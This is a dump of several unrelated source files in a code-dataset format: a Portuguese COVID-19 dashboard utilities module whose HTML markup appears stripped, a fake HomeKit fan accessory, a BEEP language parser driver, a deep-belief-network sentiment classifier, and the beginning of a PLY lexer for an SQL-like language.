DimensãoIndicadorNovo NormalRisco ModeradoRisco AltoRisco Altíssimo
\n

Situação da doença


\n
Novos casos diários (Média móvel 7 dias)x<=3.73.7<x<=12.512.5<=x<=27.4x >= 27.4
Tendência de novos casos diáriosSe crescendo*, mover para o nível mais alto
Controle da doençaNúmero de reprodução efetiva<0.5<0.5 - 1><1 - 1.2> >1.2
Capacidade de respostas do sistema de saúdeProjeção de tempo para ocupação total de leitos UTI60 - 90 dias30 - 60 dias15 - 30 dias0 - 15 dias
Confiança dos dadosSubnotificação (casos não diagnosticados a cada 10 infectados)4>=x>06>=x>47>=x>610>=x>=7
\n
\n
\n * Como determinamos a tendência:\n
    \n
  • Crescendo: caso o aumento de novos casos esteja acontecendo por pelo menos 5 dias.
  • \n
  • Descrescendo: caso a diminuição de novos casos esteja acontecendo por pelo menos 14 dias.
  • \n
  • Estabilizando: qualquer outra mudança.
  • \n
\n
\n
\n
\n
\"\"\"\n\n\n# VIEW COMPONENTS FAROLCOVID\n\ndef genHeroSection(title1: str, title2: str, subtitle: str, logo: str, header: bool):\n\n if header:\n header = \"\"\"coronacidades\"\"\"\n else:\n header = \"\"\"
\"\"\"\n\n st.write(\n f\"\"\"\n
\n
\n
\n {header}\n
\n {title1}
{title2}
\n {subtitle}\n
\n
\n
\n \n
\n
\n
\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genInputFields(user_input, config, session):\n\n # # Inicia sem update\n # session.update = False\n\n authors_beds = user_input[\"author_number_beds\"]\n beds_update = user_input[\"last_updated_number_beds\"]\n\n authors_icu_beds = user_input[\"author_number_icu_beds\"]\n icu_beds_update = user_input[\"last_updated_number_icu_beds\"]\n\n if session.reset or session.number_beds == None:\n number_beds = int(\n user_input[\"number_beds\"]\n * config[\"br\"][\"simulacovid\"][\"resources_available_proportion\"]\n )\n\n number_icu_beds = int(\n user_input[\"number_icu_beds\"]\n * config[\"br\"][\"simulacovid\"][\"resources_available_proportion\"]\n )\n number_cases = int(user_input[\"population_params\"][\"I_confirmed\"])\n number_deaths = int(user_input[\"population_params\"][\"D\"])\n session.reset = False\n else:\n number_beds = int(session.number_beds)\n number_icu_beds = int(session.number_icu_beds)\n number_cases = int(session.number_cases)\n number_deaths = int(session.number_deaths)\n\n cases_update = pd.to_datetime(user_input[\"last_updated_cases\"]).strftime(\"%d/%m\")\n\n locality = user_input[\"locality\"]\n\n if locality == \"Brasil\":\n authors_beds = \"SUS e Embaixadores\"\n authors_icu_beds = \"SUS e Embaixadores\"\n\n user_input[\"number_beds\"] = st.number_input(\n f\"Número de leitos destinados aos pacientes com Covid-19 (50% do reportado em {authors_beds}; atualizado: {beds_update})\",\n 0,\n None,\n number_beds,\n )\n\n user_input[\"number_icu_beds\"] = st.number_input(\n f\"Número de leitos UTI destinados aos pacientes com Covid-19 (50% do reportado em {authors_icu_beds}; atualizado: {icu_beds_update}):\",\n 0,\n None,\n number_icu_beds,\n )\n\n user_input[\"population_params\"][\"I_confirmed\"] = st.number_input(\n f\"Casos confirmados (fonte: Brasil.IO; atualizado: {cases_update}):\",\n 0,\n None,\n number_cases,\n )\n\n user_input[\"population_params\"][\"D\"] = st.number_input(\n f\"Mortes confirmadas (fonte: Brasil.IO; atualizado: {cases_update}):\",\n 0,\n None,\n number_deaths,\n )\n\n # Faz o update quando clica o botão\n if st.button(\"Finalizar alteração\"):\n\n session.number_beds = int(user_input[\"number_beds\"])\n session.number_icu_beds = int(user_input[\"number_icu_beds\"])\n session.number_cases = int(user_input[\"population_params\"][\"I_confirmed\"])\n session.number_deaths = int(user_input[\"population_params\"][\"D\"])\n\n session.update = True\n else:\n session.update = False\n\n if st.button(\"Resetar aos valores oficais\"):\n session.reset = True\n alteration_button_style = \"\"\"border: 1px solid var(--main-white);box-sizing: border-box;border-radius: 15px; width: auto;padding: 0.5em;text-transform: uppercase;font-family: var(--main-header-font-family);color: var(--main-white);background-color: var(--main-primary);font-weight: bold;text-align: center;text-decoration: none;font-size: 14px;animation-name: fadein;animation-duration: 3s;margin-top: 1em;\"\"\"\n reset_button_style = \"\"\"position:absolute;right:3em;top:-68px;border: 1px solid var(--main-white);box-sizing: border-box;border-radius: 15px; width: auto;padding: 0.5em;text-transform: uppercase;font-family: var(--main-header-font-family);color: var(--main-white);background-color: rgb(160,170,178);font-weight: bold;text-align: center;text-decoration: none;font-size: 14px;animation-name: fadein;animation-duration: 3s;margin-top: 1em;\"\"\"\n stylizeButton(\n \"Finalizar alteração\", alteration_button_style, session,\n )\n stylizeButton(\n \"Resetar aos valores oficais\", reset_button_style, session,\n )\n return user_input, session\n\n\n# TODO: not used\ndef translate_risk(risk_value):\n if risk_value == \"nan\":\n return \"Indef\"\n else:\n try:\n return loader.config[\"br\"][\"farolcovid\"][\"categories\"][risk_value]\n except:\n return risk_value\n\n\ndef genAnalysisDimmensionsCard(dimension: Dimension):\n return f\"\"\"
\n
\n {dimension.text}\n
\n
\"\"\"\n\n\ndef genAnalysisDimmensionsSection(dimensions: List[Dimension]):\n cards = list(map(genAnalysisDimmensionsCard, dimensions))\n cards = \"\".join(cards)\n\n st.write(\n f\"\"\"\n
\n
\n DIMENSÕES DA ANÁLISE\n
\n O que olhamos ao avaliar o cenário da pandemia em um lugar?\n
\n {cards}\n
\n
\"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genIndicatorCard(indicator: Indicator):\n\n if indicator.display == \"None\":\n indicator.display = \"\"\n indicator.unit = \"\"\n\n # Get name of alert by number\n if indicator.risk == \"nan\":\n alert = \"\"\n else:\n alert = loader.config[\"br\"][\"farolcovid\"][\"categories\"][int(indicator.risk)]\n \n if indicator.right_display == \"estabilizando\":\n indicator_right_display = \"estabilizando em \" + alert\n else:\n indicator_right_display = indicator.right_display\n \n \n\n risk_html_class = \"bold white-span p4\"\n\n return f\"\"\"\n
\n {indicator.header}\n {indicator.caption}\n
\n
\n {indicator.display} {indicator.unit}\n
\n {alert}\n
\n
\n {indicator.left_label}
\n {indicator.left_display}\n
\n
\n {indicator.right_label}
\n {indicator_right_display}\n
\n
\"\"\"\n\n\ndef genKPISection(\n place_type: str,\n locality: str,\n alert: str,\n indicators: Dict[str, Indicator],\n n_colapse_regions: int = 0,\n):\n print(\"\\n\\nQual o alerta?\", alert)\n if not isinstance(alert, str):\n bg = \"gray\"\n alert=\"Sem classificação\"\n caption = \"Sugerimos que confira o nível de risco de seu estado. (Veja Níveis de Risco no menu ao lado)
Seu município não possui dados consistentes suficientes para calcularmos o nível de risco.\"\n stoplight = \"%0a%0a\"\n else:\n bg = AlertBackground(alert).name\n\n if \"state\" in place_type:\n place_type = \"estado\"\n if n_colapse_regions > 0:\n caption = f\"Seu estado está em Risco {alert.upper()} de colapso. Note que {n_colapse_regions} regionais de saúde avaliadas estão em Risco Alto ou Altíssimo.
Recomendamos que políticas de resposta à crise da Covid-19 sejam avaliadas a nível subestatal.\"\n else:\n caption = f\"Seu estado está em Risco {alert.upper()} de colapso. Nenhuma regional de saúde avaliada está em Risco Alto ou Altíssimo de colapso.
Recomendamos que políticas de resposta à crise da Covid-19 sejam avaliadas a nível subestatal.\"\n\n elif \"healt_region\" in place_type:\n place_type = \"regional\"\n caption = f\"Risco {alert.upper()} de colapso no sistema de saúde.\"\n else:\n place_type = \"município\"\n caption = f\"Risco {alert.upper()} de colapso no sistema de saúde.\"\n\n msg = f\"\"\"🚨 *BOLETIM CoronaCidades | {locality}, {datetime.now().strftime('%d/%m')}* \n 🚨%0a%0aNÍVEL DE ALERTA: {alert.upper()}\n %0a%0a😷 *SITUAÇÃO DA DOENÇA*: Hoje são reportados❗em média *{indicators['situation'].display} casos por 100mil habitantes.\n %0a%0a *CONTROLE DA DOENÇA*: A taxa de contágio mais recente é de *{indicators['control'].left_display}* - ou seja, uma pessoa infecta em média *{indicators['control'].left_display}* outras.\n %0a%0a🏥 *CAPACIDADE DO SISTEMA*: A capacidade hospitalar será atingida em *{str(indicators['capacity'].display).replace(\"+\", \"mais\")} meses* \n %0a%0a🔍 *CONFIANÇA DOS DADOS*: A cada 10 pessoas infectadas, *{indicators['trust'].display} são diagnosticadas* \n %0a%0a👉 Saiba se seu município está no nível de alerta baixo, médio ou alto acessando o *FarolCovid* aqui: https://coronacidades.org/farol-covid/\"\"\"\n # msg = \"temporarily disabled\"\n\n cards = list(map(genIndicatorCard, indicators.values()))\n cards = \"\".join(cards)\n info_modal = gen_info_modal()\n \n st.write(\n \"\"\"
\n
\n \n %s\n
%s
\n
%s
\n
\n
\n
\n \"\"\"\n % (bg, locality, msg, caption, cards, info_modal),\n unsafe_allow_html=True,\n )\n\n\ndef genProductCard(product: Product):\n if product.recommendation == \"Sugerido\":\n badge_style = \"primary-bg\"\n elif product.recommendation == \"Risco alto\":\n product.recommendation = \"Espere\"\n badge_style = f\"red-alert-bg\"\n elif product.recommendation == \"Risco baixo\":\n product.recommendation = \"Explore\"\n badge_style = \"primary-bg\"\n else:\n badge_style = \"primary-bg\"\n\n return f\"\"\"
\n \n
\n {product.name}\n
\n {product.caption}\n {product.recommendation}\n
\n \"\"\"\n\n\ndef genProductsSection(products: List[Product]):\n cards = list(map(genProductCard, products))\n cards = \"\".join(cards)\n\n st.write(\n f\"\"\"\n
\n O QUE MAIS VOCÊ QUER SABER SOBRE O SEU MUNICÍPIO?\n
{cards}
\n
\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genInputCustomizationSectionHeader(locality: str) -> None:\n st.write(\n \"\"\"\n
\n Verifique os dados disponíveis (%s)\n

\n Usamos os dados do Brasil.io e DataSUS, mas é possível que esses dados estejam um pouco desatualizados. Se estiverem, é só ajustar os valores abaixo para continuar a simulação.\n
\n
\"\"\"\n % locality,\n unsafe_allow_html=True,\n )\n\n\ndef gen_footer() -> None:\n\n st.write(\n \"\"\"\n
\n
\n
\n A equipe do Coronacidades está à disposição para apoiar o gestor público a aprofundar a análise para seu estado ou município, de forma inteiramente gratuita.\n Também queremos queremos ouvir sua opinião sobre a ferramenta, entre em contato via chat (canto inferior direito). Outras ferramentas e mais recursos para responder à crise da Covid-19 estão disponíveis em nosso site \n coronacidades.org.
\n As análises apresentadas no Farol Covid são indicativas, feitas a partir de dados oficiais públicos e estudos referenciados já publicados, estando sujeitas a variáveis que aqui não podem ser consideradas.\n Trata-se de contribuição à elaboração de cenários por parte dos governos e não configura qualquer obrigação ou responsabilidade perante as decisões efetivadas.\n Saiba mais sobre os cálculos por trás de análises e indicadores em nossas páginas de Níveis de Risco e Modelo Epidemiológico (menu lateral esquerdo), \n que mantemos atualizadas conforme evoluímos em nossas metodologias.

\n Todo código da ferramenta pode ser acessado no Github do projeto\n e os dados estão disponíveis em nossa API.\n

\n \n
\n \n \n
\n
\n
\n
\"\"\"\n % (Logo.IMPULSO.value, Logo.CORONACIDADES.value, Logo.ARAPYAU.value),\n unsafe_allow_html=True,\n )\n\n\n# VIEW COMPONENTS SIMULACOVID\n\n\ndef gen_ambassador_section() -> None:\n\n st.write(\n \"\"\"\n
\n
\n
IMPORTANTE: Usamos dados abertos e históricos para calcular os indicadores.

\n Quer aprofundar a análise para seu Estado ou Município? A equipe do Coronacidades está disponível de forma inteiramente gratuita!\n FALE CONOSCO\n
\"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genSimulatorOutput(output: SimulatorOutput) -> str:\n\n beds_img = \"https://i.imgur.com/27hutU0.png\"\n icu_beds_img = \"https://i.imgur.com/Oh4l8qM.png\"\n\n if output.min_range_beds < 3 and output.max_range_beds < 3:\n bed_projection = f\"em até {output.max_range_beds} mês(es)\"\n else:\n bed_projection = \"mais de 2 meses\"\n\n if output.min_range_icu_beds < 3 and output.max_range_icu_beds < 3:\n icu_bed_projection = f\"em até {output.max_range_icu_beds} mês(es)\"\n else:\n icu_bed_projection = \"mais de 2 meses\"\n\n output = \"\"\"\n
\n
\n
\n
\n \n %s\n \n
\n \n será atingida a capacidade máxima de leitos\n \n
\n \n
\n
\n
\n
\n
\n \n %s\n \n
\n \n meses será atingida a capacidade máxima de leitos UTI\n \n
\n \n
\n
\"\"\" % (\n bed_projection,\n beds_img,\n icu_bed_projection,\n icu_beds_img,\n )\n\n return output.strip(\"\\n\\t\")\n\n\ndef genChartSimulationSection(simulation: SimulatorOutput, fig) -> None:\n\n simulation = genSimulatorOutput(simulation)\n\n st.write(\n \"\"\"
\n
\n
\n Aqui está o resultado da sua simulação\n
\n
\n %s\n
\n
\n Visão detalhada da sua simulação
\n \n NOTA: \n Para evitar uma sobrecarga hospitalar, a sua demanda (a curva 📈) deve ficar sempre abaixo da respectiva linhas tracejadas (a reta horizontal ➖).\n Em outras palavras, a quantidade de pessoas que precisam ser internadas por dia não deve ultrapassar o número de equipamentos disponíveis.\n \n
\n
\n
\n \"\"\"\n % (simulation),\n unsafe_allow_html=True,\n )\n\n st.plotly_chart(fig, use_container_width=True)\n\n\ndef try_int(possible_int):\n try:\n return int(float(possible_int))\n except Exception as e:\n return possible_int\n\n\n# def genVideoTutorial():\n# st.write(\n# \"\"\"
\n# Antes de começar: entenda como usar!\n#
\"\"\",\n# unsafe_allow_html=True,\n# )\n# st.video(Link.YOUTUBE_TUTORIAL.value)\n\n\n# def genStateInputSectionHeader() -> None:\n# st.write(\n# \"\"\"\n#
\n# Etapa 1: Selecione o seu Estado\n#
\n# \"\"\",\n# unsafe_allow_html=True,\n# )\n\n\n# def genMunicipalityInputSection() -> None:\n# st.write(\n# \"\"\"\n#
\n#
\n# Etapa 2: Selecione seu Município ou Região SUS\n# Se seu município não possui unidade de tratamento intensivo, sugerimos simular a situação da sua regional. Não recomendamos a simulação a nível estadual.\n#
\n#
\n# \"\"\",\n# unsafe_allow_html=True,\n# )\n\n\n# def genResourceAvailabilitySection(resources: ResourceAvailability) -> None:\n# msg = f\"\"\"\n# 🚨 *BOLETIM CoronaCidades:* {resources.locality} - {datetime.now().strftime('%d/%m')} 🚨%0a%0a\n# 😷 *{int(resources.cases)}* casos confirmados e *{int(resources.deaths)}* mortes%0a%0a\n# 🏥 Hoje estão disponíveis *{resources.beds}* leitos e *{resources.ventilators}* ventiladores destinados à Covid %0a%0a\n# 👉 _Acompanhe e simule a situação do seu município acessando o *SimulaCovid* aqui_: https://coronacidades.org/ \"\"\"\n\n# st.write(\n# \"\"\"\n#
\n#
\n#
\n# Panorama %s\n# Compartilhar no Whatsapp\n#
\n#
\n#
\n# Progressão da Transmissão\n#
\n#
\n#
\n# %i\n# casos confirmados\n#
\n#
\n# %i\n# mortes\n#
\n#
\n# Fonte: Brasil.IO atualizado diariamente com base em boletins das secretarias de saúde publicados.\n#
\n#
\n#
\n# Capacidade hospitalar destinada à COVID\n#
\n#
\n#
\n# %i\n# leitos\n#
\n#
\n# %i\n# ventiladores\n#
\n#
\n# Fonte:\n# DATASUS CNES, Fevereiro 2020. Assumimos que 20%% dos leitos complementares e ventiladores registrados da rede SUS e não-SUS seriam alocados para pacientes da Covid-19. Esse número poderá ser ajustado na simulação abaixo.\n# \n#
\n# Esse dado está desatualizado? Você tem informações mais recentes e pode colaborar conosco?\n# Estamos montando uma rede para manter o SimulaCovid sempre atualizado e nossas projeções serem úteis para tomada de decisão na sua cidade. Venha ser parte do nosso time de embaixadores!\n# Quero ser embaixador\n#
\n#
\n#
\n#
\n# \"\"\"\n# % (\n# resources.locality,\n# msg,\n# resources.cases,\n# resources.deaths,\n# resources.beds,\n# resources.ventilators,\n# Link.AMBASSADOR_FORM.value,\n# ),\n# unsafe_allow_html=True,\n# )\n\n\n# def genSimulationSection(\n# active_cases: int,\n# locality: str,\n# resources: ResourceAvailability,\n# worst_case: SimulatorOutput,\n# best_case: SimulatorOutput,\n# ) -> None:\n# no_quarentine = (\n# \"mais de 90\"\n# if (worst_case.max_range_beds == -1 and worst_case.max_range_ventilators == -1)\n# else min(worst_case.max_range_beds, worst_case.max_range_ventilators)\n# )\n# date_proj = \"\"\n# if no_quarentine != \"mais de 90\":\n# proj = (datetime.now() + timedelta(days=int(no_quarentine))).strftime(\"%d/%m\")\n# date_proj = f\" *({proj})* \"\n\n# msg = f\"\"\"\n# 🚨 *BOLETIM SimulaCovid:* {resources.locality} - {datetime.now().strftime('%d/%m')} 🚨%0a%0a\n# 🏥 Considerando que {resources.locality} tem *{resources.beds}* leitos 🛏️ e *{resources.ventilators}* ventiladores ⚕ %0a%0a\n# 😷 Na ausência de isolamento social, {resources.locality} poderia atingir a sua capacidade hospitalar em *{no_quarentine}* dias{date_proj}%0a%0a\n# 👉 _Acompanhe e simule a situação do seu município acessando o *SimulaCovid* aqui_: https://coronacidades.org/ \"\"\"\n\n# status_quo = genSimulatorOutput(worst_case)\n# restrictions = genSimulatorOutput(best_case)\n\n# st.write(\n# \"\"\"\n#
\n#
\n#
\n# \n# %s\n#
\n# Daqui a quantos dias será atingida a capacidade hospitalar?\n#
\n#
\n#
\n#
\n# \n# Sem Políticas de Restrição\n# \n#
\n# %s\n#
\n#
\n#
\n# \n# Com Medidas Restritivas (Isolamento Social)\n# \n#
\n# %s\n# Compartilhar no Whatsapp\n#
\n#
\n#
\n# \"\"\"\n# % (locality, status_quo, restrictions, msg),\n# unsafe_allow_html=True,\n# )\n\n\n# def genActNowSection(locality, worst_case):\n# display = (\n# \"\"\n# if any(\n# value != -1\n# for value in [\n# worst_case.min_range_beds,\n# worst_case.max_range_beds,\n# worst_case.min_range_ventilators,\n# worst_case.max_range_ventilators,\n# ]\n# )\n# else \"hide\"\n# )\n\n# st.write(\n# \"\"\"\n#
\n#
\n#
\n# %s | Você precisa agir agora \n# Para prevenir uma sobrecarga hospitalar, é preciso implementar uma estratégia de contenção. Quanto antes você agir, mais vidas consegue salvar.\n#
\n#
\n#
\n# \"\"\"\n# % (display, locality),\n# unsafe_allow_html=True,\n# )\n\n# def genStrategyCard(strategy: ContainmentStrategy) -> str:\n# return \"\"\"\n#
\n#
\n# ESTRATÉGIA %i\n#
\n# %s\n#
\n#
\n# \n# %s\n#
\"\"\" % (\n# strategy.color.value,\n# strategy.code,\n# strategy.background.value,\n# strategy.name,\n# strategy.image_url,\n# strategy.description,\n# )\n\n\n# def genStrategiesSection(strategies: List[ContainmentStrategy]) -> None:\n# cards = list(map(genStrategyCard, strategies))\n# cards = \"\".join(cards)\n# st.write(\n# \"\"\"\n#
\n#
\n# E como você pode reagir?\n#
%s
\n#
\n#
\n# \"\"\"\n# % cards,\n# unsafe_allow_html=True,\n# )\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":49681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524522263","text":"\"\"\"A fake fan that does nothing but to demonstrate optional characteristics.\"\"\"\nimport logging\n\nfrom pyhap.accessory import Accessory, Category\nimport pyhap.loader as loader\n\nlogger = logging.getLogger(__name__)\n\n\nclass FakeFan(Accessory):\n \"\"\"A fake fan accessory that logs changes to its rotation speed and direction.\"\"\"\n\n category = Category.FAN\n\n def set_rotation_speed(self, value):\n logger.debug(\"Rotation speed changed: %s\", value)\n\n def set_rotation_direction(self, value):\n logger.debug(\"Rotation direction changed: %s\", value)\n\n def _set_services(self):\n \"\"\"Add the fan service. Also add optional characteristics to it.\"\"\"\n super(FakeFan, self)._set_services()\n service_loader = loader.get_serv_loader()\n fan_service = service_loader.get(\"Fan\")\n # NOTE: Don't forget that all characteristics must be added to the service before\n # adding the service to the accessory, so that it can assign IIDs to all.\n\n # Add the optional RotationSpeed characteristic to the Fan\n rotation_speed_char = loader.get_char_loader().get(\"RotationSpeed\")\n fan_service.add_opt_characteristic(rotation_speed_char)\n rotation_speed_char.setter_callback = self.set_rotation_speed\n\n # Add the optional RotationSpeed characteristic to the Fan\n rotation_dir_char = loader.get_char_loader().get(\"RotationDirection\")\n fan_service.add_opt_characteristic(rotation_dir_char)\n rotation_dir_char.setter_callback = self.set_rotation_direction\n\n self.add_service(fan_service)\n","sub_path":"deps/lib/python3.5/site-packages/pyhap/accessories/FakeFan.py","file_name":"FakeFan.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"157726660","text":"#!/usr/bin/env python3\n# p5Driver.py\n# Purpose: \n# To execute the BEEP source code and store all variables and labels \n# to their respective dictionary\n# Input: \n# A file with BEEP source code \n# Output:\n# The source code itself with line number on the left hand side\n# A list of variables that includes the variable's name, type and initial value (alphabetically)\n# A list of labels that includes the label's name, line number (alphabetically)\n\nimport os\nimport sys\nimport re\nfrom p5Dict import declareVar, declareLabel, printVariables, printLabels\n\n# Empty dictionary for:\n# varTypeD - The data type for the variable\n# varValueD - The initial value for the variable \n# labelD - The line number for labels\nvarTypeD = {}\nvarValueD = {}\nlabelD ={}\n\n# extracting the arguments\nargs= list(x for x in sys.argv[:])\n\n# assign the beep file\nbeep_file_name = args[1]\n\n# open for reading\ntry:\n with open(beep_file_name,'r', encoding='latin-1') as beep_file: \n # parse the items\n lines = beep_file.readlines()\nexcept IOError: \n print('ERROR OPENING A FILE')\nexcept:\n print('SOMETHING UNEXPECTED HAPPENDED!!!')\n\n# Print the header output, \n# For loop to output the file line by line start with line number relative to 1\n# Regex testing to call the appropriate function\n# \n# line_num - line number relative to 1\n\nline_num = 0\nprint('BEEP source code in {}'.format(args[1]))\nfor line in lines:\n line_num += 1\n line = line.rstrip('\\n')\n print('{}. {}'.format(line_num,line) )\n \n # Regex testing for specific pattern\n var_pattern = r'^\\s*VAR.*$'\n comment_pattern = r'^\\s*#.*$'\n label_pattern = r'^\\s*\\S.+:\\s*((ASSIGN)|(IF)|(PRINT)|(GOTO)|(assign)|(if)|(print)|(goto)).*$'\n stat_pattern = r'^\\s*((ASSIGN)|(IF)|(PRINT)|(GOTO)|(assign)|(if)|(print)|(goto)).*$'\n\n # searching for specific pattern (for prog 5, only need variable and label)\n # VAR\n match = re.search(var_pattern, line)\n if match:\n # split the line into a list of string \n temp = line.split()[1:]\n declareVar (temp,varTypeD,varValueD)\n\n # labels\n match = re.search(label_pattern, line)\n if match:\n declareLabel(line, line_num, labelD)\n\n# Print the variables and labels alphabetically\nprintVariables(varTypeD,varValueD)\nprintLabels(labelD)\n","sub_path":"PL/Prog5/TracLong/p5Driver.py","file_name":"p5Driver.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"246692667","text":"#logistic regrssiom, naive bayes, svm\nfrom dbn_outside.dbn.tensorflow import SupervisedDBNClassification\nfrom sentiment_analysis import create_feature_set_and_labels\nimport numpy as np\nfrom statistics import mean\nimport pickle\nfrom sklearn.metrics.classification import accuracy_score\nfrom tfidf_vectorizer import get_features\nfrom sklearn.metrics import f1_score\n\n# train_x,train_y,test_x,test_y = pickle.load(open(\"attr.pickle\",\"rb\"))\n# train_x = np.array(list(train_x))\ntrain_x, train_y, test_x, test_y = get_features('dbn')\n#train_x, train_y, test_x, test_y = create_feature_set_and_labels('pos_final.txt', 'neg_final.txt')\n#print(type(train_x))\nprint(len(train_x),len(train_y),len(test_x),len(test_y))\ntrain_x = np.array(train_x,dtype=np.float32)\n#print(type(train_x))\ntrain_y = np.array(train_y,dtype=np.int32)\ntest_x = np.array(test_x,dtype=np.float32)\ntest_y = np.array(test_y,dtype=np.int32)\nprint(type(train_x))\nclassifier = SupervisedDBNClassification(hidden_layers_structure=[256,256,256],\n learning_rate_rbm=0.05,\n learning_rate=0.1,\n n_epochs_rbm=10,\n n_iter_backprop=100,\n batch_size=32,\n activation_function='relu',\n dropout_p=0.2)\nclassifier.fit(train_x, train_y)\n# classifier = SupervisedDBNClassification.load('model.pkl')\n# classifier.save('model.pkl')\naccuracies = []\nf_measures = []\nfor i in range(1):\n y_pred = classifier.predict(test_x)\n accuracy = accuracy_score(test_y, y_pred)\n f_measure = f1_score(test_y, y_pred)\n accuracies.append(accuracy)\n f_measures.append(f_measure)\nprint(accuracies)\nprint('Accuracy ', mean(accuracies))\nprint('F-measure', mean(f_measures))\n","sub_path":"dbn_neuralnet.py","file_name":"dbn_neuralnet.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"180425416","text":"# --------------------------------------------------------------------------------\n# Universidad de San Carlos de Guatemala\n# Facultad de Ingenieria\n# Escuela de Ciencias y Sistemas\n# Organizacion de Lenguajes y Compiladores 2\n# GRUPO 4\n# ANALIZADOR LÉXICO\n# --------------------------------------------------------------------------------\n\nimport ply.lex as lex\nfrom Statics.errorTable import ErrorTable\n\nreserved = {\n\n # Numerc Types\n 'smallint': 'SMALLINT',\n 'integer': 'INTEGER', #\n 'bigint': 'BIGINT', \n 'decimal': 'DECIMAL_T',\n 'numeric': 'NUMERIC',\n 'real': 'REAL', #\n 'double': 'DOUBLE',\n 'precition': 'PRECITION',\n 'money': 'MONEY',\n 'float': 'FLOAT',\n\n # Boolean Type\n 'boolean': 'BOOLEAN', #\n 'true': 'TRUE',\n 'false': 'FALSE',\n 'yes': 'YES',\n 'no': 'NO',\n 'off': 'OFF',\n\n # Character types\n 'character': 'CHARACTER',\n 'varying': 'VARYING',\n 'varchar': 'VARCHAR',\n 'char': 'CHAR',\n 'text': 'TEXT',\n\n # Date/Time Types\n 'timestamp': 'TIMESTAMP',\n 'date': 'DATE',\n 'time': 'TIME',\n 'interval': 'INTERVAL',\n 'year': 'YEAR',\n 'month': 'MONTH',\n 'day': 'DAY',\n 'hour': 'HOUR',\n 'minute': 'MINUTE',\n 'second': 'SECOND',\n 'extract': 'EXTRACT',\n 'date_part': 'DATE_PART',\n #'now': 'NOW',\n 'current_date': 'CURRENT_DATE',\n 'current_time': 'CURRENT_TIME',\n\n # Enumerated Type\n 'enum': 'ENUM',\n\n # Operators\n 'between': 'BETWEEN',\n 'symmetric': 'SYMMETRIC',\n 'in': 'IN',\n 'like': 'LIKE',\n 'ilike': 'ILIKE',\n 'similar': 'SIMILAR',\n 'is': 'IS',\n 'isnull': 'ISNULL',\n 'notnull': 'NOTNULL',\n 'not': 'NOT',\n 'and': 'AND',\n 'or': 'OR',\n 'null': 'NULL',\n\n # Conditionals\n 'if': 'IF',\n 'else': 'ELSE',\n\n # Generals\n 'use': 'USE',\n 'database': 'DATABASE',\n 'databases': 'DATABASES',\n 'create': 'CREATE',\n 'insert': 'RINSERT',\n 'into': 'INTO',\n 'alter': 'ALTER',\n 'table': 'TABLE',\n 'show': 'SHOW',\n 'drop': 'RDROP',\n 'delete': 'RDELETE',\n 'truncate': 'RTRUNCATE',\n 'primary': 'PRIMARY',\n 'foreign': 'FOREIGN',\n 'key': 'KEY',\n 'add': 'ADD',\n 'column': 'COLUMN',\n 'set': 'SET',\n 'type': 'TYPE',\n 'constraint': 'CONSTRAINT',\n 'unique': 'UNIQUE',\n 'check': 'CHECK',\n 'references': 'REFERENCES',\n 'exists': 'EXISTS',\n 'replace': 'REPLACE',\n 'owner': 'OWNER',\n 'new_owner': 'NEW_OWNER',\n 'current_user': 'CURRENT_USER',\n 'session_user': 'SESSION_USER',\n 'mode': 'MODE',\n 'rename': 'RENAME',\n 'inherits': 'INHERITS',\n 'values': 'VALUES',\n 'update': 'UPDATE',\n 'where': 'WHERE',\n 'from': 'FROM',\n 'select': 'RSELECT',\n 'distinct': 'DISTINCT',\n 'group': 'GROUP',\n 'order': 'ORDER',\n 'by': 'BY',\n 'as': 'AS',\n 'having': 'HAVING',\n 'unknown': 'UNKNOWN',\n 'escape': 'ESCAPE',\n 'any': 'ANY',\n 'all': 'ALL',\n 'some': 'SOME',\n 'left': 'LEFT',\n 'right': 'RIGHT',\n 'full': 'FULL',\n 'outer': 'OUTER',\n 'inner': 'INNER',\n 'join': 'JOIN',\n 'on': 'ON',\n 'using': 'USING',\n 'natural': 'NATURAL',\n 'asc': 'ACS',\n 'desc': 'DESC',\n 'first': 'FIRST',\n 'last': 'LAST',\n 'case': 'CASE',\n 'when': 'WHEN',\n 'then': 'THEN',\n 'end': 'END',\n 'greatest': 'GREATEST',\n 'least': 'LEAST',\n 'limit': 'LIMIT',\n 'offset': 'OFFSET',\n 'union': 'RUNION',\n 'intersect': 'RINTERSECT',\n 'except': 'REXCEPT',\n 'to': 'TO'\n\n}\n\ntokens = [\n 'INT',\n 'DECIMAL',\n 'ID',\n 'CADENA',\n 'SUMA',\n 'RESTA',\n 'MULT',\n 'DIVISION',\n 'POTENCIA',\n 'MODULO',\n 'PARI',\n 'PARD',\n 'PUNTO',\n 'PCOMA',\n 'COMA',\n 'LLAVEI',\n 'LLAVED',\n 'CORCHI',\n 'CORCHD',\n 'IGUAL',\n 'MENORQ',\n 'MAYORQ',\n 'MAYORIGUAL',\n 'MENORIGUAL',\n 'IGUALQ',\n 'DISTINTO',\n 'CONCAT',\n 'BAND',\n 'BOR',\n 'NUMERAL',\n 'VIRGULILLA',\n 'MOVD',\n 'MOVI',\n 'NEWLINE'\n\n] + list(reserved.values())\n\n# Operadores aritméticos\nt_SUMA = r'\\+'\nt_RESTA = r'-'\nt_MULT = r'\\*'\nt_DIVISION = r'/'\nt_POTENCIA = r'\\^'\nt_MODULO = r'%'\nt_PARI = r'\\('\nt_PARD = r'\\)'\nt_PUNTO = r'\\.'\nt_PCOMA = r'\\;'\nt_COMA = r'\\,'\nt_LLAVEI = r'{'\nt_LLAVED = r'}'\nt_CORCHI = r'\\['\nt_CORCHD = r'\\]'\nt_IGUAL = r'\\='\n\n# Operadores relacionales\nt_MENORQ = r'\\<'\nt_MAYORQ = r'\\>'\nt_MENORIGUAL = r'\\<='\nt_MAYORIGUAL = r'\\>='\nt_IGUALQ = r'\\=='\n\nt_CONCAT = 